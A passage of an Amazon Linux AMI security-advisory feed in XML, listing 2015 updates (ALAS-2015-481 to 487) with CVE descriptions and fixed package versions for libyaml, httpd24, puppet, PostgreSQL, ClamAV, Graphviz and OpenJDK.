</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566" title="" id="CVE-2014-3566" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6585" title="" id="CVE-2014-6585" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6587" title="" id="CVE-2014-6587" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6591" title="" id="CVE-2014-6591" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6593" title="" id="CVE-2014-6593" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6601" title="" id="CVE-2014-6601" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0383" title="" id="CVE-2015-0383" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0395" title="" id="CVE-2015-0395" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0407" title="" id="CVE-2015-0407" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0408" title="" id="CVE-2015-0408" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0410" title="" id="CVE-2015-0410" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0412" title="" id="CVE-2015-0412" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0085.html" title="" id="RHSA-2015:0085" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-src" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.34-67.1.13.6.0.69.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.34-67.1.13.6.0.69.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.34-67.1.13.6.0.69.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.34-67.1.13.6.0.69.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.34-67.1.13.6.0.69.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.34-67.1.13.6.0.69.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.34-67.1.13.6.0.69.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.34-67.1.13.6.0.69.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.34-67.1.13.6.0.69.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.34-67.1.13.6.0.69.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.34-67.1.13.6.0.69.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.34" release="67.1.13.6.0.69.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.34-67.1.13.6.0.69.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-481</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-481: medium priority package update for libyaml</title><issued date="2015-02-11 19:38:00" /><updated date="2015-02-11 19:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9130:
An assertion failure was found in the way the libyaml library parsed wrapped strings. An attacker able to load specially crafted YAML input into an application using libyaml could cause the application to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9130" title="" id="CVE-2014-9130" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0100.html" title="" id="RHSA-2015:0100" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libyaml" version="0.1.6" release="6.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-0.1.6-6.7.amzn1.x86_64.rpm</filename></package><package name="libyaml-devel" version="0.1.6" release="6.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-devel-0.1.6-6.7.amzn1.x86_64.rpm</filename></package><package name="libyaml-debuginfo" version="0.1.6" release="6.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-debuginfo-0.1.6-6.7.amzn1.x86_64.rpm</filename></package><package name="libyaml-devel" version="0.1.6" release="6.7.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-devel-0.1.6-6.7.amzn1.i686.rpm</filename></package><package name="libyaml-debuginfo" version="0.1.6" release="6.7.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-debuginfo-0.1.6-6.7.amzn1.i686.rpm</filename></package><package name="libyaml" version="0.1.6" release="6.7.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-0.1.6-6.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-482</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-482: medium priority package update for perl-YAML-LibYAML</title><issued date="2015-02-11 19:39:00" /><updated date="2015-02-11 19:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9130:
An assertion failure was found in the way the libyaml library parsed wrapped strings. An attacker able to load specially crafted YAML input into an application using libyaml could cause the application to crash.
1169369:
CVE-2014-9130 libyaml: assert failure when processing wrapped strings
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9130" title="" id="CVE-2014-9130" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-YAML-LibYAML-debuginfo" version="0.59" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-YAML-LibYAML-debuginfo-0.59-1.16.amzn1.x86_64.rpm</filename></package><package name="perl-YAML-LibYAML" version="0.59" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-YAML-LibYAML-0.59-1.16.amzn1.x86_64.rpm</filename></package><package name="perl-YAML-LibYAML" version="0.59" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/perl-YAML-LibYAML-0.59-1.16.amzn1.i686.rpm</filename></package><package name="perl-YAML-LibYAML-debuginfo" version="0.59" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/perl-YAML-LibYAML-debuginfo-0.59-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-483</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-483: low priority package update for httpd24</title><issued date="2015-02-12 10:57:00" /><updated date="2015-02-12 11:32:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8109:
mod_lua.c in the mod_lua module in the Apache HTTP Server 2.3.x and 2.4.x through 2.4.10 does not support an httpd configuration in which the same Lua authorization provider is used with different arguments within different contexts, which allows remote attackers to bypass intended access restrictions in opportunistic circumstances by leveraging multiple Require directives, as demonstrated by a configuration that specifies authorization for one group to access a certain directory, and authorization for a second group to access a second directory.
1174077:
CVE-2014-8109 httpd: LuaAuthzProvider argument handling issue
CVE-2014-3583:
The handle_headers function in mod_proxy_fcgi.c in the mod_proxy_fcgi module in the Apache HTTP Server 2.4.10 allows remote FastCGI servers to cause a denial of service (buffer over-read and daemon crash) via long response headers.
1163555:
CVE-2014-3583 httpd: mod_proxy_fcgi handle_headers() buffer over read
CVE-2014-3581:
A NULL pointer dereference flaw was found in the way the mod_cache httpd module handled Content-Type headers. A malicious HTTP server could cause the httpd child process to crash when the Apache HTTP server was configured to proxy to a server with caching enabled.
1149709:
CVE-2014-3581 httpd: NULL pointer dereference in mod_cache if Content-Type has empty value
CVE-2013-5704:
The mod_headers module in the Apache HTTP Server 2.2.22 allows remote attackers to bypass "RequestHeader unset" directives by placing a header in the trailer portion of data sent with chunked transfer coding. NOTE: the vendor states "this is not a security issue in httpd as such."
A flaw was found in the way httpd handled HTTP Trailer headers when processing requests using chunked encoding. A malicious client could use Trailer headers to set additional HTTP headers after header processing was performed by other modules. This could, for example, lead to a bypass of header restrictions defined with mod_headers.
1082903:
CVE-2013-5704 httpd: bypass of mod_headers rules via chunked requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5704" title="" id="CVE-2013-5704" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3581" title="" id="CVE-2014-3581" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3583" title="" id="CVE-2014-3583" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8109" title="" id="CVE-2014-8109" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-manual" version="2.4.10" release="15.58.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.10-15.58.amzn1.noarch.rpm</filename></package><package name="mod24_session" version="2.4.10" release="15.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.10-15.58.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.10" release="15.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.10-15.58.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.10" release="15.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.10-15.58.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.10" release="15.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.10-15.58.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.10" release="15.58.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.10-15.58.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.10" release="15.58.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.10-15.58.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.10" release="15.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.10-15.58.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.10" release="15.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.10-15.58.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.10" release="15.58.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.10-15.58.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.10" release="15.58.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.10-15.58.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.10" release="15.58.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.10-15.58.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.10" release="15.58.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.10-15.58.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.10" release="15.58.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.10-15.58.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.10" release="15.58.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.10-15.58.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.10" release="15.58.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.10-15.58.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.10" release="15.58.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.10-15.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-484</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-484: medium priority package update for puppet</title><issued date="2015-02-12 15:13:00" /><updated date="2015-02-12 15:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3248:
Untrusted search path vulnerability in Puppet Enterprise 2.8 before 2.8.7, Puppet before 2.7.26 and 3.x before 3.6.2, Facter 1.6.x and 2.x before 2.0.2, Hiera before 1.3.4, and Mcollective before 2.5.2, when running with Ruby 1.9.1 or earlier, allows local users to gain privileges via a Trojan horse file in the current working directory, as demonstrated using (1) rubygems/defaults/operating_system.rb, (2) Win32API.rb, (3) Win32API.so, (4) safe_yaml.rb, (5) safe_yaml/deep.rb, or (6) safe_yaml/deep.so; or (7) operatingsystem.rb, (8) operatingsystem.so, (9) osfamily.rb, or (10) osfamily.so in puppet/confine.
1101346:
CVE-2014-3248 puppet: Ruby modules could be loaded from the current working directory
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3248" title="" id="CVE-2014-3248" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="puppet-server" version="2.7.25" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/puppet-server-2.7.25-1.4.amzn1.noarch.rpm</filename></package><package name="puppet" version="2.7.25" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/puppet-2.7.25-1.4.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-485</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-485: medium priority package update for postgresql93</title><issued date="2015-02-25 20:34:00" /><updated date="2015-02-25 20:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0244:
A flaw was found in way PostgreSQL handled certain errors during that were generated during protocol synchronization. An authenticated database user could use this flaw to inject queries into an existing connection.
1188694:
CVE-2015-0244 postgresql: loss of frontend/backend protocol synchronization after an error
CVE-2015-0243:
A stack-buffer overflow flaw was found in PostgreSQL's pgcrypto module. An authenticated database user could use this flaw to cause PostgreSQL to crash or, potentially, execute arbitrary code with the permissions of the user running PostgreSQL.
1188689:
CVE-2015-0243 postgresql: buffer overflow flaws in contrib/pgcrypto
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0243" title="" id="CVE-2015-0243" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0244" title="" id="CVE-2015-0244" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql93-docs" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.6" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.6-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.6-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.6" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.6-1.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-486</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-486: medium priority package update for clamav</title><issued date="2015-03-04 15:52:00" /><updated date="2015-03-04 16:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9328:
ClamAV before 0.98.6 allows remote attackers to have unspecified impact via a crafted upack packer file, related to a "heap out of bounds condition."
1187050:
CVE-2014-9328 clamav: heap out of bounds condition with crafted upack packer files
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9328" title="" id="CVE-2014-9328" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-lib" version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamav-server" version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-server-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamav-debuginfo" version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamav-scanner" version="0.98.6" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-0.98.6-1.11.amzn1.noarch.rpm</filename></package><package name="clamav-milter" version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamav-update" version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamav-milter-sysvinit" version="0.98.6" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-milter-sysvinit-0.98.6-1.11.amzn1.noarch.rpm</filename></package><package name="clamav-data" version="0.98.6" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.98.6-1.11.amzn1.noarch.rpm</filename></package><package name="clamav-db" version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamd" version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamav-devel" version="0.98.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.98.6-1.11.amzn1.x86_64.rpm</filename></package><package name="clamav-scanner-sysvinit" version="0.98.6" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-scanner-sysvinit-0.98.6-1.11.amzn1.noarch.rpm</filename></package><package name="clamav-filesystem" version="0.98.6" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.98.6-1.11.amzn1.noarch.rpm</filename></package><package name="clamav-data-empty" version="0.98.6" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-empty-0.98.6-1.11.amzn1.noarch.rpm</filename></package><package name="clamav-server-sysvinit" version="0.98.6" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-server-sysvinit-0.98.6-1.11.amzn1.noarch.rpm</filename></package><package name="clamav-update" version="0.98.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.98.6-1.11.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.98.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.98.6-1.11.amzn1.i686.rpm</filename></package><package name="clamav-server" version="0.98.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-server-0.98.6-1.11.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.98.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.98.6-1.11.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.98.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.98.6-1.11.amzn1.i686.rpm</filename></package><package name="clamd" version="0.98.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.98.6-1.11.amzn1.i686.rpm</filename></package><package name="clamav" version="0.98.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.98.6-1.11.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.98.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.98.6-1.11.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.98.6" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.98.6-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-487</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-487: medium priority package update for graphviz</title><issued date="2015-03-04 15:53:00" /><updated date="2015-03-04 16:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9157:
Format string vulnerability in the yyerror function in lib/cgraph/scan.l in Graphviz allows remote attackers to have unspecified impact via format string specifiers in unknown vector, which are not properly handled in an error string.
1167866:
CVE-2014-9157 graphviz: format string vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9157" title="" id="CVE-2014-9157" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphviz-debuginfo" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-debuginfo-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-gd" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-gd-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-doc" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-doc-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-R" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-R-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-guile" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-guile-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-lua" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-lua-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-java" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-java-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-ruby" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-ruby-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-graphs" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-graphs-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-devel" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-devel-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-perl" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-perl-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-tcl" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-tcl-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-python" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-python-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-php54" version="2.38.0" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphviz-php54-2.38.0-18.44.amzn1.x86_64.rpm</filename></package><package name="graphviz-python" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-python-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-php54" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-php54-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-perl" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-perl-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-ruby" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-ruby-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-guile" version="2.38.0" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/graphviz-guile-2.38.0-18.44.amzn1.i686.rpm</filename></package><package name="graphviz-R" version="2.38.0" release="18.44.amzn1" epoch="0" 